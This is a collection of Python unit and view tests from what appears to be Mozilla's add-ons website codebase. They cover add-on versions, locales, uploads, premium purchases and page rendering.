f = Addon.featured_random(amo.FIREFOX, 'fr')
eq_(sorted(f), [1001, 1003, 2464, 7661, 15679])
f = Addon.featured_random(amo.THUNDERBIRD, 'en-US')
eq_(f, [])
def test_featured_random(self):
self._test_featured_random()
class TestBackupVersion(amo.tests.TestCase):
fixtures = ['addons/update', 'base/apps', 'base/appversion',
'base/platforms']
def setUp(self):
self.version_1_2_0 = 105387
self.addon = Addon.objects.get(pk=1865)
set_user(None)
def setup_new_version(self):
for version in Version.objects.filter(pk__gte=self.version_1_2_0):
appversion = version.apps.all()[0]
appversion.min = AppVersion.objects.get(version='4.0b1')
appversion.save()
def test_no_backup_version(self):
self.addon.update_version()
eq_(self.addon.backup_version, None)
eq_(self.addon.current_version.version, '1.2.2')
def test_no_current_version(self):
for v in Version.objects.all():
v.delete()
self.addon.update(_current_version=None)
eq_(self.addon.backup_version, None)
eq_(self.addon.current_version, None)
def test_has_backup_version(self):
self.setup_new_version()
assert self.addon.update_version()
eq_(self.addon.backup_version.version, '1.1.3')
eq_(self.addon.current_version.version, '1.2.2')
def test_backup_version(self):
self.setup_new_version()
assert self.addon.update_version()
eq_(self.addon.backup_version.version, '1.1.3')
def test_firefox_versions(self):
self.setup_new_version()
assert self.addon.update_version()
backup = self.addon.backup_version.compatible_apps[amo.FIREFOX]
eq_(backup.max.version, '3.7a5pre')
eq_(backup.min.version, '3.0.12')
current = self.addon.current_version.compatible_apps[amo.FIREFOX]
eq_(current.max.version, '4.0b8pre')
eq_(current.min.version, '3.0.12')
def test_version_signals(self):
self.setup_new_version()
version = self.addon.versions.all()[0]
assert not self.addon.backup_version
version.save()
assert Addon.objects.get(pk=1865).backup_version
class TestCategoryModel(amo.tests.TestCase):
def test_category_url(self):
"""Every type must have a url path for its categories."""
for t in amo.ADDON_TYPE.keys():
if t == amo.ADDON_DICT:
continue # Language packs don't have categories.
cat = Category(type=AddonType(id=t), slug='omg')
assert cat.get_url_path()
@patch('mkt.webapps.tasks.index_webapps')
def test_reindex_on_change(self, index_mock):
c = Category.objects.create(type=amo.ADDON_WEBAPP, slug='keyboardcat')
app = amo.tests.app_factory()
AddonCategory.objects.create(addon=app, category=c)
c.update(slug='nyancat')
assert index_mock.called
eq_(index_mock.call_args[0][0], [app.id])
class TestPreviewModel(amo.tests.TestCase):
fixtures = ['base/previews']
def test_as_dict(self):
expect = ['caption', 'full', 'thumbnail']
reality = sorted(Preview.objects.all()[0].as_dict().keys())
eq_(expect, reality)
def test_filename(self):
preview = Preview.objects.get(pk=24)
eq_(preview.file_extension, 'png')
preview.update(filetype='')
eq_(preview.file_extension, 'png')
preview.update(filetype='video/webm')
eq_(preview.file_extension, 'webm')
def test_filename_in_url(self):
preview = Preview.objects.get(pk=24)
preview.update(filetype='video/webm')
assert 'png' in preview.thumbnail_path
assert 'webm' in preview.image_path
class TestListedAddonTwoVersions(amo.tests.TestCase):
fixtures = ['addons/listed-two-versions']
def test_listed_two_versions(self):
Addon.objects.get(id=2795) # bug 563967
class TestFlushURLs(amo.tests.TestCase):
fixtures = ['base/apps',
'base/appversion',
'base/platforms',
'base/users',
'base/addon_5579',
'base/previews',
'base/addon_4664_twitterbar']
def setUp(self):
settings.ADDON_ICON_URL = (
settings.STATIC_URL +
'img/uploads/addon_icons/%s/%s-%s.png?modified=%s')
settings.PREVIEW_THUMBNAIL_URL = (
settings.STATIC_URL +
'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
settings.PREVIEW_FULL_URL = (
settings.STATIC_URL +
'img/uploads/previews/full/%s/%d.%s?modified=%d')
_connect()
def tearDown(self):
_disconnect()
def is_url_hashed(self, url):
return urlparse(url).query.find('modified') > -1
@patch('amo.tasks.flush_front_end_cache_urls.apply_async')
def test_addon_flush(self, flush):
addon = Addon.objects.get(pk=159)
addon.icon_type = "image/png"
addon.save()
for url in (addon.thumbnail_url, addon.icon_url):
assert url in flush.call_args[1]['args'][0]
assert self.is_url_hashed(url), url
@patch('amo.tasks.flush_front_end_cache_urls.apply_async')
def test_preview_flush(self, flush):
addon = Addon.objects.get(pk=4664)
preview = addon.previews.all()[0]
preview.save()
for url in (preview.thumbnail_url, preview.image_url):
assert url in flush.call_args[1]['args'][0]
assert self.is_url_hashed(url), url
class TestAddonFromUpload(UploadTest):
fixtures = ('base/apps', 'base/users')
def setUp(self):
super(TestAddonFromUpload, self).setUp()
u = UserProfile.objects.get(pk=999)
set_user(u)
self.platform = Platform.objects.create(id=amo.PLATFORM_MAC.id)
for version in ('3.0', '3.6.*'):
AppVersion.objects.create(application_id=1, version=version)
self.addCleanup(translation.deactivate)
def manifest(self, basename):
return os.path.join(settings.ROOT, 'mkt', 'developers', 'tests',
'addons', basename)
def test_xpi_attributes(self):
addon = Addon.from_upload(self.get_upload('extension.xpi'),
[self.platform])
eq_(addon.name, 'xpi name')
eq_(addon.guid, 'guid@xpi')
eq_(addon.type, amo.ADDON_EXTENSION)
eq_(addon.status, amo.STATUS_NULL)
eq_(addon.homepage, 'http://homepage.com')
eq_(addon.summary, 'xpi description')
eq_(addon.description, None)
eq_(addon.slug, 'xpi-name')
def test_manifest_url(self):
upload = self.get_upload(abspath=self.manifest('mozball.webapp'))
addon = Addon.from_upload(upload, [self.platform])
assert addon.is_webapp()
eq_(addon.manifest_url, upload.name)
def test_app_domain(self):
upload = self.get_upload(abspath=self.manifest('mozball.webapp'))
upload.name = 'http://mozilla.com/my/rad/app.webapp' # manifest URL
addon = Addon.from_upload(upload, [self.platform])
eq_(addon.app_domain, 'http://mozilla.com')
def test_non_english_app(self):
upload = self.get_upload(abspath=self.manifest('non-english.webapp'))
upload.name = 'http://mozilla.com/my/rad/app.webapp' # manifest URL
addon = Addon.from_upload(upload, [self.platform])
eq_(addon.default_locale, 'it')
eq_(unicode(addon.name), 'ItalianMozBall')
eq_(addon.name.locale, 'it')
def test_xpi_version(self):
addon = Addon.from_upload(self.get_upload('extension.xpi'),
[self.platform])
v = addon.versions.get()
eq_(v.version, '0.1')
eq_(v.files.get().platform_id, self.platform.id)
eq_(v.files.get().status, amo.STATUS_UNREVIEWED)
def test_xpi_for_multiple_platforms(self):
platforms = [Platform.objects.get(pk=amo.PLATFORM_LINUX.id),
Platform.objects.get(pk=amo.PLATFORM_MAC.id)]
addon = Addon.from_upload(self.get_upload('extension.xpi'),
platforms)
v = addon.versions.get()
eq_(sorted([f.platform.id for f in v.all_files]),
sorted([p.id for p in platforms]))
def test_search_attributes(self):
addon = Addon.from_upload(self.get_upload('search.xml'),
[self.platform])
eq_(addon.name, 'search tool')
eq_(addon.guid, None)
eq_(addon.type, amo.ADDON_SEARCH)
eq_(addon.status, amo.STATUS_NULL)
eq_(addon.homepage, None)
eq_(addon.description, None)
eq_(addon.slug, 'search-tool')
eq_(addon.summary, 'Search Engine for Firefox')
def test_search_version(self):
addon = Addon.from_upload(self.get_upload('search.xml'),
[self.platform])
v = addon.versions.get()
eq_(v.version, datetime.now().strftime('%Y%m%d'))
eq_(v.files.get().platform_id, amo.PLATFORM_ALL.id)
eq_(v.files.get().status, amo.STATUS_UNREVIEWED)
def test_no_homepage(self):
addon = Addon.from_upload(self.get_upload('extension-no-homepage.xpi'),
[self.platform])
eq_(addon.homepage, None)
def test_default_locale(self):
# Make sure default_locale follows the active translation.
addon = Addon.from_upload(self.get_upload('search.xml'),
[self.platform])
eq_(addon.default_locale, 'en-US')
translation.activate('es')
addon = Addon.from_upload(self.get_upload('search.xml'),
[self.platform])
eq_(addon.default_locale, 'es')
def test_webapp_default_locale_override(self):
with nested(tempfile.NamedTemporaryFile('w', suffix='.webapp'),
open(self.manifest('mozball.webapp'))) as (tmp, mf):
mf = json.load(mf)
mf['default_locale'] = 'es'
tmp.write(json.dumps(mf))
tmp.flush()
upload = self.get_upload(abspath=tmp.name)
addon = Addon.from_upload(upload, [self.platform])
eq_(addon.default_locale, 'es')
def test_webapp_default_locale_unsupported(self):
with nested(tempfile.NamedTemporaryFile('w', suffix='.webapp'),
open(self.manifest('mozball.webapp'))) as (tmp, mf):
mf = json.load(mf)
mf['default_locale'] = 'gb'
tmp.write(json.dumps(mf))
tmp.flush()
upload = self.get_upload(abspath=tmp.name)
addon = Addon.from_upload(upload, [self.platform])
eq_(addon.default_locale, 'en-US')
def test_browsing_locale_does_not_override(self):
with translation.override('fr'):
# Upload app with en-US as default.
upload = self.get_upload(abspath=self.manifest('mozball.webapp'))
addon = Addon.from_upload(upload, [self.platform])
eq_(addon.default_locale, 'en-US') # not fr
@raises(forms.ValidationError)
def test_malformed_locales(self):
manifest = self.manifest('malformed-locales.webapp')
upload = self.get_upload(abspath=manifest)
Addon.from_upload(upload, [self.platform])
REDIRECT_URL = 'http://outgoing.mozilla.org/v1/'
class TestRemoveLocale(amo.tests.TestCase):
def test_remove(self):
a = Addon.objects.create(type=1)
a.name = {'en-US': 'woo', 'el': 'yeah'}
a.description = {'en-US': 'woo', 'el': 'yeah', 'he': 'ola'}
a.save()
a.remove_locale('el')
qs = (Translation.objects.filter(localized_string__isnull=False)
.values_list('locale', flat=True))
eq_(sorted(qs.filter(id=a.name_id)), ['en-US'])
eq_(sorted(qs.filter(id=a.description_id)), ['en-US', 'he'])
def test_remove_version_locale(self):
addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
version = Version.objects.create(addon=addon)
version.releasenotes = {'fr': 'oui'}
version.save()
addon.remove_locale('fr')
assert not (Translation.objects.filter(localized_string__isnull=False)
.values_list('locale', flat=True))
class TestUpdateNames(amo.tests.TestCase):
def setUp(self):
self.addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
self.addon.name = self.names = {'en-US': 'woo'}
self.addon.save()
def get_name(self, app, locale='en-US'):
return Translation.objects.no_cache().get(id=app.name_id,
locale=locale)
def check_names(self, names):
"""`names` in {locale: name} format."""
for locale, localized_string in names.iteritems():
eq_(self.get_name(self.addon, locale).localized_string,
localized_string)
def test_new_name(self):
names = dict(self.names, **{'de': u'frü'})
self.addon.update_names(names)
self.addon.save()
self.check_names(names)
def test_new_names(self):
names = dict(self.names, **{'de': u'frü', 'es': u'eso'})
self.addon.update_names(names)
self.addon.save()
self.check_names(names)
def test_remove_name_missing(self):
names = dict(self.names, **{'de': u'frü', 'es': u'eso'})
self.addon.update_names(names)
self.addon.save()
self.check_names(names)
# Now update without de to remove it.
del names['de']
self.addon.update_names(names)
self.addon.save()
names['de'] = None
self.check_names(names)
def test_remove_name_with_none(self):
names = dict(self.names, **{'de': u'frü', 'es': u'eso'})
self.addon.update_names(names)
self.addon.save()
self.check_names(names)
# Now update without de to remove it.
names['de'] = None
self.addon.update_names(names)
self.addon.save()
self.check_names(names)
def test_add_and_remove(self):
names = dict(self.names, **{'de': u'frü', 'es': u'eso'})
self.addon.update_names(names)
self.addon.save()
self.check_names(names)
# Now add a new locale and remove an existing one.
names['de'] = None
names['fr'] = u'oui'
self.addon.update_names(names)
self.addon.save()
self.check_names(names)
def test_default_locale_change(self):
names = dict(self.names, **{'de': u'frü', 'es': u'eso'})
self.addon.default_locale = 'de'
self.addon.update_names(names)
self.addon.save()
self.check_names(names)
addon = self.addon.reload()
eq_(addon.default_locale, 'de')
def test_default_locale_change_remove_old(self):
names = dict(self.names, **{'de': u'frü', 'es': u'eso', 'en-US': None})
self.addon.default_locale = 'de'
self.addon.update_names(names)
self.addon.save()
self.check_names(names)
eq_(self.addon.reload().default_locale, 'de')
def test_default_locale_removal_not_deleted(self):
names = {'en-US': None}
self.addon.update_names(names)
self.addon.save()
self.check_names(self.names)
class TestAddonWatchDisabled(amo.tests.TestCase):
def setUp(self):
self.addon = Addon(type=amo.ADDON_EXTENSION, disabled_by_user=False,
status=amo.STATUS_PUBLIC)
self.addon.save()
@patch('addons.models.File.objects.filter')
def test_no_disabled_change(self, file_mock):
mock = Mock()
file_mock.return_value = [mock]
self.addon.save()
assert not mock.unhide_disabled_file.called
assert not mock.hide_disabled_file.called
@patch('addons.models.File.objects.filter')
def test_disable_addon(self, file_mock):
mock = Mock()
file_mock.return_value = [mock]
self.addon.update(disabled_by_user=True)
assert not mock.unhide_disabled_file.called
assert mock.hide_disabled_file.called
@patch('addons.models.File.objects.filter')
def test_admin_disable_addon(self, file_mock):
mock = Mock()
file_mock.return_value = [mock]
self.addon.update(status=amo.STATUS_DISABLED)
assert not mock.unhide_disabled_file.called
assert mock.hide_disabled_file.called
@patch('addons.models.File.objects.filter')
def test_enable_addon(self, file_mock):
mock = Mock()
file_mock.return_value = [mock]
self.addon.update(status=amo.STATUS_DISABLED)
mock.reset_mock()
self.addon.update(status=amo.STATUS_PUBLIC)
assert mock.unhide_disabled_file.called
assert not mock.hide_disabled_file.called
class TestLanguagePack(amo.tests.TestCase, amo.tests.AMOPaths):
def setUp(self):
super(TestLanguagePack, self).setUp()
self.addon = amo.tests.addon_factory(type=amo.ADDON_LPAPP,
status=amo.STATUS_PUBLIC)
self.platform_all = Platform.objects.get(id=amo.PLATFORM_ALL.id)
self.platform_mob = Platform.objects.create(id=amo.PLATFORM_ANDROID.id)
self.version = self.addon.current_version
def test_extract(self):
File.objects.create(platform=self.platform_mob, version=self.version,
filename=self.xpi_path('langpack-localepicker'),
status=amo.STATUS_PUBLIC)
assert self.addon.reload().get_localepicker()
assert 'title=Select a language' in self.addon.get_localepicker()
def test_extract_no_file(self):
File.objects.create(
platform=self.platform_mob, version=self.version,
filename=self.xpi_path('langpack'), status=amo.STATUS_PUBLIC)
eq_(self.addon.reload().get_localepicker(), '')
def test_extract_no_files(self):
eq_(self.addon.get_localepicker(), '')
def test_extract_not_language_pack(self):
File.objects.create(platform=self.platform_mob, version=self.version,
filename=self.xpi_path('langpack-localepicker'),
status=amo.STATUS_PUBLIC)
assert self.addon.reload().get_localepicker()
self.addon.update(type=amo.ADDON_EXTENSION)
eq_(self.addon.get_localepicker(), '')
def test_extract_not_platform_mobile(self):
File.objects.create(platform=self.platform_all, version=self.version,
filename=self.xpi_path('langpack-localepicker'),
status=amo.STATUS_PUBLIC)
eq_(self.addon.reload().get_localepicker(), '')
class TestMarketplace(amo.tests.TestCase):
def setUp(self):
self.addon = Addon(type=amo.ADDON_EXTENSION)
def test_is_premium(self):
assert not self.addon.is_premium()
self.addon.premium_type = amo.ADDON_PREMIUM
assert self.addon.is_premium()
def test_is_premium_inapp(self):
assert not self.addon.is_premium()
self.addon.premium_type = amo.ADDON_PREMIUM_INAPP
assert self.addon.is_premium()
def test_is_premium_free(self):
assert not self.addon.is_premium()
self.addon.premium_type = amo.ADDON_FREE_INAPP
assert not self.addon.is_premium()
def test_can_be_premium_upsell(self):
self.addon.premium_type = amo.ADDON_PREMIUM
self.addon.save()
free = Addon.objects.create(type=amo.ADDON_EXTENSION)
AddonUpsell.objects.create(free=free, premium=self.addon)
assert not free.can_become_premium()
def test_can_be_premium_status(self):
for status in amo.STATUS_CHOICES.keys():
self.addon.status = status
if status in amo.PREMIUM_STATUSES:
assert self.addon.can_become_premium()
else:
assert not self.addon.can_become_premium()
def test_webapp_can_become_premium(self):
self.addon.type = amo.ADDON_WEBAPP
for status in amo.STATUS_CHOICES.keys():
self.addon.status = status
assert self.addon.can_become_premium(), status
def test_can_be_premium_type(self):
for type in amo.ADDON_TYPES.keys():
self.addon.update(type=type)
if type in [amo.ADDON_EXTENSION, amo.ADDON_WEBAPP,
amo.ADDON_LPAPP, amo.ADDON_DICT]:
assert self.addon.can_become_premium()
else:
assert not self.addon.can_become_premium()
class TestAddonUpsell(amo.tests.TestCase):
def setUp(self):
self.one = Addon.objects.create(type=amo.ADDON_EXTENSION, name='free')
self.two = Addon.objects.create(type=amo.ADDON_EXTENSION,
name='premium')
self.upsell = AddonUpsell.objects.create(free=self.one,
premium=self.two)
def test_create_upsell(self):
eq_(self.one.upsell.free, self.one)
eq_(self.one.upsell.premium, self.two)
eq_(self.two.upsell, None)
def test_delete(self):
self.upsell = AddonUpsell.objects.create(free=self.two,
premium=self.one)
# Note: delete ignores if status 0.
self.one.update(status=amo.STATUS_PUBLIC)
self.one.delete()
eq_(AddonUpsell.objects.count(), 0)
class TestAddonPurchase(amo.tests.TestCase):
fixtures = ['base/users']
def setUp(self):
self.user = UserProfile.objects.get(pk=999)
self.addon = Addon.objects.create(type=amo.ADDON_EXTENSION,
premium_type=amo.ADDON_PREMIUM,
name='premium')
def test_no_premium(self):
# If you've purchased something, the fact that its now free
# doesn't change the fact that you purchased it.
self.addon.addonpurchase_set.create(user=self.user)
self.addon.update(premium_type=amo.ADDON_FREE)
assert self.addon.has_purchased(self.user)
def test_has_purchased(self):
self.addon.addonpurchase_set.create(user=self.user)
assert self.addon.has_purchased(self.user)
def test_not_purchased(self):
assert not self.addon.has_purchased(self.user)
def test_anonymous(self):
assert not self.addon.has_purchased(None)
assert not self.addon.has_purchased(AnonymousUser)
def test_is_refunded(self):
self.addon.addonpurchase_set.create(user=self.user,
type=amo.CONTRIB_REFUND)
assert self.addon.is_refunded(self.user)
def test_is_chargeback(self):
self.addon.addonpurchase_set.create(user=self.user,
type=amo.CONTRIB_CHARGEBACK)
assert self.addon.is_chargeback(self.user)
def test_purchase_state(self):
purchase = self.addon.addonpurchase_set.create(user=self.user)
for state in [amo.CONTRIB_PURCHASE, amo.CONTRIB_REFUND,
amo.CONTRIB_CHARGEBACK]:
purchase.update(type=state)
eq_(state, self.addon.get_purchase_type(self.user))
class TestQueue(amo.tests.TestCase):
def test_in_queue(self):
addon = Addon.objects.create(guid='f', type=amo.ADDON_EXTENSION)
assert not addon.in_escalation_queue()
EscalationQueue.objects.create(addon=addon)
assert addon.in_escalation_queue()
########NEW FILE########
__FILENAME__ = test_search
from nose.tools import eq_
import amo.tests
from addons.models import (Addon, attach_categories, attach_devices,
attach_prices, attach_tags, attach_translations)
from addons.search import extract
class TestExtract(amo.tests.TestCase):
fixtures = ['base/apps', 'base/users', 'base/addon_3615']
def setUp(self):
self.attrs = ('id', 'slug', 'app_slug', 'created', 'last_updated',
'weekly_downloads', 'average_daily_users', 'status',
'type', 'hotness', 'is_disabled', 'premium_type',
'uses_flash')
self.transforms = (attach_categories, attach_devices, attach_prices,
attach_tags, attach_translations)
def _extract(self):
qs = Addon.objects.filter(id__in=[3615])
for t in self.transforms:
qs = qs.transform(t)
self.addon = list(qs)[0]
return extract(self.addon)
def test_extract_attributes(self):
extracted = self._extract()
for attr in self.attrs:
eq_(extracted[attr], getattr(self.addon, attr))
########NEW FILE########
__FILENAME__ = test_utils_
from nose.tools import eq_
from addons.utils import get_featured_ids
import amo.tests
class TestGetFeaturedIds(amo.tests.TestCase):
fixtures = ['addons/featured',
'base/addon_3615', 'base/collections', 'base/featured',
'base/users']
no_locale = (1001, 1003, 2464, 7661, 15679)
en_us_locale = (3481,)
all_locales = no_locale + en_us_locale
no_locale_type_one = (1001, 1003, 2464, 7661)
def setUp(self):
super(TestGetFeaturedIds, self).setUp()
def test_by_app(self):
eq_(set(get_featured_ids(amo.FIREFOX)),
set(self.all_locales))
def test_by_type(self):
eq_(set(get_featured_ids(amo.FIREFOX, 'xx', 1)),
set(self.no_locale_type_one))
def test_by_locale(self):
eq_(set(get_featured_ids(amo.FIREFOX)),
set(self.all_locales))
eq_(set(get_featured_ids(amo.FIREFOX, 'xx')),
set(self.no_locale))
eq_(set(get_featured_ids(amo.FIREFOX, 'en-US')),
set(self.no_locale + self.en_us_locale))
def test_locale_shuffle(self):
# Make sure the locale-specific add-ons are at the front.
ids = get_featured_ids(amo.FIREFOX, 'en-US')
eq_((ids[0],), self.en_us_locale)
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
from datetime import datetime
import re
from django import test
from django.conf import settings
from django.core import mail
from django.core.cache import cache
from django.test.client import Client
from mock import patch
from nose import SkipTest
from nose.tools import eq_, nottest
from pyquery import PyQuery as pq
import amo
import amo.tests
from amo.helpers import absolutify, numberfmt, urlparams
from amo.urlresolvers import reverse
from abuse.models import AbuseReport
from addons.models import Addon, AddonUser
from files.models import File
from users.helpers import users_list
from users.models import UserProfile
from versions.models import Version
def norm(s):
"""Normalize a string so that whitespace is uniform and remove whitespace
between tags."""
s = re.sub(r'\s+', ' ', str(s)).strip()
return re.sub(r'>\s+<', '><', s)
def add_addon_author(original, copy):
"""Make both add-ons share an author."""
author = original.listed_authors[0]
AddonUser.objects.create(addon=copy, user=author, listed=True)
return author
def check_cat_sidebar(url, addon):
"""Ensures that the sidebar shows the categories for the correct type."""
cache.clear()
for type_ in [amo.ADDON_EXTENSION, amo.ADDON_SEARCH]:
addon.update(type=type_)
r = Client().get(url)
eq_(pq(r.content)('#side-nav').attr('data-addontype'), str(type_))
@nottest
def test_hovercards(self, doc, addons, src=''):
addons = list(addons)
eq_(doc.find('.addon.hovercard').length, len(addons))
for addon in addons:
btn = doc.find('.install[data-addon=%s]' % addon.id)
eq_(btn.length, 1)
hc = btn.parents('.addon.hovercard')
eq_(hc.find('a').attr('href'),
urlparams(addon.get_url_path(), src=src))
eq_(hc.find('h3').text(), unicode(addon.name))
class TestHomepage(amo.tests.TestCase):
fixtures = ['base/apps']
def setUp(self):
self.base_url = reverse('home')
def test_thunderbird(self):
"""Thunderbird homepage should have the Thunderbird title."""
r = self.client.get('/en-US/thunderbird/')
doc = pq(r.content)
eq_('Add-ons for Thunderbird', doc('title').text())
def test_welcome_msg(self):
r = self.client.get('/en-US/firefox/')
welcome = pq(r.content)('#site-welcome').remove('a.close')
eq_(welcome.text(),
'Welcome to Firefox Add-ons. Choose from thousands of extra '
'features and styles to make Firefox your own.')
r = self.client.get('/en-US/thunderbird/')
welcome = pq(r.content)('#site-welcome').remove('a.close')
eq_(welcome.text(),
'Welcome to Thunderbird Add-ons. Add extra features and styles to '
'make Thunderbird your own.')
class TestHomepageFeatures(amo.tests.TestCase):
fixtures = ['base/apps',
'base/appversion',
'base/users',
'base/addon_3615',
'base/collections',
'base/global-stats',
'base/featured',
'addons/featured']
def setUp(self):
self.url = reverse('home')
def test_no_unreviewed(self):
response = self.client.get(self.url)
addon_lists = 'popular featured hotness'.split()
for key in addon_lists:
for addon in response.context[key]:
assert addon.status != amo.STATUS_UNREVIEWED
def test_seeall(self):
# What is this testing and does it make sense without bandwagon (or AMO)?
doc = pq(self.client.get(self.url).content)
browse_collections = reverse('collections.list')
sections = {
'#featured-collections': browse_collections + '?sort=featured',
}
for id_, url in sections.iteritems():
# Check that the "See All" link points to the correct page.
eq_(doc.find('%s .seeall' % id_).attr('href'), url)
@amo.tests.mobile_test
def test_mobile_home_extensions_only(self):
r = self.client.get(self.url)
addons = r.context['featured'] + r.context['popular']
assert all([a.type == amo.ADDON_EXTENSION for a in addons]), (
'Expected only extensions to be listed on mobile homepage')
@amo.tests.mobile_test
def test_mobile_home_featured(self):
r = self.client.get(self.url)
featured = r.context['featured']
assert all([a.is_featured(amo.FIREFOX, 'en-US') for a in featured]), (
'Expected only featured extensions to be listed under Featured')
@amo.tests.mobile_test
def test_mobile_home_popular(self):
r = self.client.get(self.url)
popular = r.context['popular']
eq_([a.id for a in popular],
[a.id for a in sorted(popular, key=lambda x: x.average_daily_users,
reverse=True)])
class TestPromobox(amo.tests.TestCase):
fixtures = ['addons/ptbr-promobox']
def test_promo_box_ptbr(self):
# bug 564355, we were trying to match pt-BR and pt-br
response = self.client.get('/pt-BR/firefox/', follow=True)
eq_(response.status_code, 200)
class TestDeveloperPages(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/addon_592', 'base/apps',
'base/users', 'addons/eula+contrib-addon',
'addons/addon_228106_info+dev+bio.json',
'addons/addon_228107_multiple-devs.json']
def test_meet_the_dev_title(self):
r = self.client.get(reverse('addons.meet', args=['a592']))
title = pq(r.content)('title').text()
eq_(title.startswith('Meet the Gmail S/MIME Developer'), True)
def test_roadblock_title(self):
r = self.client.get(reverse('addons.meet', args=['a592']))
title = pq(r.content)('title').text()
eq_(title.startswith('Meet the Gmail S/MIME Developer'), True)
def test_meet_the_dev_src(self):
r = self.client.get(reverse('addons.meet', args=['a11730']))
button = pq(r.content)('.install-button a.button').attr('href')
eq_(button.endswith('?src=developers'), True)
def test_nl2br_info(self):
r = self.client.get(reverse('addons.meet', args=['a228106']))
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('.bio').html(),
'Bio: This is line one.<br/><br/>This is line two')
addon_reasons = doc('#about-addon p')
eq_(addon_reasons.eq(0).html(),
'Why: This is line one.<br/><br/>This is line two')
eq_(addon_reasons.eq(1).html(),
'Future: This is line one.<br/><br/>This is line two')
def test_nl2br_info_for_multiple_devs(self):
# Get an Add-on that has multiple developers,
# which will trigger the else block in the template.
r = self.client.get(reverse('addons.meet', args=['a228107']))
eq_(r.status_code, 200)
bios = pq(r.content)('.bio')
eq_(bios.eq(0).html(),
'Bio1: This is line one.<br/><br/>This is line two')
eq_(bios.eq(1).html(),
'Bio2: This is line one.<br/><br/>This is line two')
def test_roadblock_src(self):
url = reverse('addons.roadblock', args=['a11730'])
# If they end up at the roadblock we force roadblock on them
r = self.client.get(url + '?src=dp-btn-primary')
button = pq(r.content)('.install-button a.button').attr('href')
eq_(button.endswith('?src=dp-btn-primary'), True)
# No previous source gets the roadblock page source
r = self.client.get(url)
button = pq(r.content)('.install-button a.button').attr('href')
eq_(button.endswith('?src=meetthedeveloper_roadblock'), True)
def test_roadblock_different(self):
url = reverse('addons.roadblock', args=['a11730'])
r = self.client.get(url + '?src=dp-btn-primary')
button = pq(r.content)('.install-button a.button').attr('href')
eq_(button.endswith('?src=dp-btn-primary'), True)
eq_(pq(r.content)('#contribute-box input[name=source]').val(),
'roadblock')
def test_contribute_multiple_devs(self):
a = Addon.objects.get(pk=592)
u = UserProfile.objects.get(pk=999)
AddonUser(addon=a, user=u).save()
r = self.client.get(reverse('addons.meet', args=['a592']))
eq_(pq(r.content)('#contribute-button').length, 1)
def test_get_old_version(self):
url = reverse('addons.meet', args=['a11730'])
r = self.client.get(url)
eq_(r.context['version'].version, '20090521')
r = self.client.get('%s?version=%s' % (url, '20080521'))
eq_(r.context['version'].version, '20080521')
def test_duplicate_version_number(self):
qs = Version.objects.filter(addon=11730)
qs.update(version='1.x')
eq_(qs.count(), 2)
url = reverse('addons.meet', args=['a11730']) + '?version=1.x'
r = self.client.get(url)
eq_(r.context['version'].version, '1.x')
def test_purified(self):
addon = Addon.objects.get(pk=592)
addon.the_reason = addon.the_future = '<b>foo</b>'
addon.save()
url = reverse('addons.meet', args=['592'])
r = self.client.get(url, follow=True)
eq_(pq(r.content)('#about-addon b').length, 2)
class TestLicensePage(amo.tests.TestCase):
fixtures = ['base/addon_3615']
def setUp(self):
self.addon = Addon.objects.get(id=3615)
self.version = self.addon.current_version
def test_legacy_redirect(self):
r = self.client.get('/versions/license/%s' % self.version.id,
follow=True)
self.assertRedirects(r, self.version.license_url(), 301)
def test_explicit_version(self):
url = reverse('addons.license', args=['a3615', self.version.version])
r = self.client.get(url)
eq_(r.status_code, 200)
eq_(r.context['version'], self.version)
def test_implicit_version(self):
url = reverse('addons.license', args=['a3615'])
r = self.client.get(url)
eq_(r.status_code, 200)
eq_(r.context['version'], self.addon.current_version)
def test_no_license(self):
self.version.update(license=None)
url = reverse('addons.license', args=['a3615'])
r = self.client.get(url)
eq_(r.status_code, 404)
def test_no_version(self):
self.addon.versions.all().delete()
url = reverse('addons.license', args=['a3615'])
r = self.client.get(url)
eq_(r.status_code, 404)
def test_duplicate_version_number(self):
Version.objects.create(addon=self.addon, version=self.version.version)
url = reverse('addons.license', args=['a3615', self.version.version])
r = self.client.get(url)
eq_(r.status_code, 200)
eq_(r.context['version'], self.addon.current_version)
def test_cat_sidebar(self):
check_cat_sidebar(reverse('addons.license', args=['a3615']),
self.addon)
class TestDetailPage(amo.tests.TestCase):
fixtures = ['base/apps',
'base/addon_3615',
'base/users',
'base/addon_59',
'base/addon_4594_a9',
'addons/listed']
def setUp(self):
self.addon = Addon.objects.get(id=3615)
self.url = self.addon.get_url_path()
def test_site_title(self):
r = self.client.get(self.url)
eq_(pq(r.content)('h1.site-title').text(), 'Add-ons')
def test_addon_headings(self):
r = self.client.get(self.url)
doc = pq(r.content)
eq_(doc('h2:first').text(), 'About this Add-on')
eq_(doc('.metadata .home').text(), 'Add-on home page')
def test_anonymous_extension(self):
response = self.client.get(self.url)
eq_(response.status_code, 200)
eq_(response.context['addon'].id, 3615)
def test_unreviewed_robots(self):
"""Check that unreviewed add-ons do not get indexed."""
url = self.addon.get_url_path()
m = 'meta[content=noindex]'
eq_(self.addon.status, amo.STATUS_PUBLIC)
settings.ENGAGE_ROBOTS = True
doc = pq(self.client.get(url).content)
assert not doc(m)
settings.ENGAGE_ROBOTS = False
doc = pq(self.client.get(url).content)
assert doc(m)
self.addon.update(status=amo.STATUS_UNREVIEWED)
settings.ENGAGE_ROBOTS = False
doc = pq(self.client.get(url).content)
assert doc(m)
settings.ENGAGE_ROBOTS = True
doc = pq(self.client.get(url).content)
assert doc(m)
def test_more_about(self):
# Don't show more about box if there's nothing to populate it.
self.addon.developer_comments_id = None
self.addon.description_id = None
self.addon.previews.all().delete()
self.addon.save()
r = self.client.get(self.url)
doc = pq(r.content)
eq_(doc('#more-about').length, 0)
eq_(doc('.article.userinput').length, 0)
def test_beta(self):
"""Test add-on with a beta channel."""
get_pq_content = lambda: pq(
self.client.get(self.url, follow=True).content)
# Add a beta version and show it.
mybetafile = self.addon.versions.all()[0].files.all()[0]
mybetafile.status = amo.STATUS_BETA
mybetafile.save()
self.addon.update(status=amo.STATUS_PUBLIC)
beta = get_pq_content()
eq_(beta('#beta-channel').length, 1)
# Now hide it. Beta is only shown for STATUS_PUBLIC.
self.addon.update(status=amo.STATUS_UNREVIEWED)
beta = get_pq_content()
eq_(beta('#beta-channel').length, 0)
